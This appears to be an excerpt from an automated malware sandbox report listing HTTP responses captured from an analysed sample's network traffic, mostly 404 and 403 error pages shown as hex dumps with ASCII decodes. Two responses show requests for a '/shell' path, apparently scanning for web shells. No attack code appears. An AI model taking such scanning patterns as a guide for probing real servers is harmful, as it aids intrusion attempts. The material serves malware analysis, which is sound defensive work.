      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 19 Jul 2022 11:08:14 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 12:06:35 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:17 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:18 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheServer: WebServerContent-Type: text/htmlContent-Length: 345Date: Tue, 19 Jul 2022 11:08:17 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:20 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 203Content-Type: text/html; charset=iso-8859-1Via: 1.1 googleData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:19 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 04:12:42 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:08:20 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:20 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Tue, 19 Jul 2022 20:08:21 GMTServer: nawsd/1.0.1-20211228X-Frame-Options: SAMEORIGINData Raw: 3c 3f 78 6d 6c 20 76 65 72 69 73 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 6c 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 6c 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml verison="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <hl>404 Not Found</hl> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:20 GMTServer: Apache/2.4.7 (Ubuntu)Cache-control: no-cacheX-frame-options: SAMEORIGINPragma: no-cacheContent-style-type: text/cssContent-script-type: text/javascriptSet-Cookie: CGISESSID=443dc8536931ec166751e85af955da76; path=/; HttpOnlyVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 54 45 4d 50 4c 41 54 45 20 46 49 4c 45 3a 20 65 72 72 6f 72 70 61 67 65 2e 74 74 20 2d 2d 3e 0a 0a 0a 0a 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 42 69 62 6c 69 6f 74 65 63 61 20 4d 61 6c 6c 69 6e 63 6b 72 6f 64 74 20 4b 6f 68 61 20 26 72 73 61 71 75 6f 3b 20 48 61 20 6f 63 75 72 72 69 64 6f 20 75 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 6f 68 61 20 31 36 2e 30 35 30 35 30 30 30 22 20 2f 3e 20 3c 21 2d 2d 20 6c 65 61 76 65 20 74 68 69 73 20 66 6f 72 20 73 74 61 74 73 20 2d 2d 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 72 69 65 6e 74 61 70 61 64 72 65 73 2e 63 6f 6d 2e 61 72 2f 69 6e 73 74 69 74 75 63 69 6f 6e 2f 32 30 2f 63 6f 6c 65 67 69 6f 2d 6d 61 6c 6c 69 6e 63 6b 72 6f 64 74 2f 6c 6f 67 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6f 70 61 63 2d 74 6d 70 6c 2f 62 6f 6f 74 73 74 72 61 70 2f 6c 69 62 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0a 0a 0a 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6f 70 61 63 2d 74 6d 70 6c 2f 62 6f 6f 74 73 74 72 61 70 2f 6c 69 62 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 2f 3e 0a 0a 0a 0a 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6f 70 61 63 2d 74 6d 70 6c 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 6f 70 61 63 2e 63 73 73 22 20 2f 3e 0a 0a 0a 20 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 685X-Iinfo: 13-5658255-0 0NNN RT(1658228902553 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 33 2d 35 36 35 38 32 35 35 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 35 38 32 32 38 39 30 32 35 35 33 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 32 33 31 36 33 33 34 37 31 32 32 33 39 32 37 31 37 26 65 64 65 74 3d 32 32 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 47 45 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 32 33 31 36 33 33 34 37 31 32 32 33 39 32 37 31 37 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=13-5658255-0%200NNN%20RT%281658228902553%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-23163347122392717&edet=22&cinfo=ffffffff&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-23163347122392717</iframe></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:25 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.24X-Powered-By: PHP/7.2.24Set-Cookie: PHPSESSID=a1e3c7d45e4003b00308c5b51857cc06; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 19:08:23 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
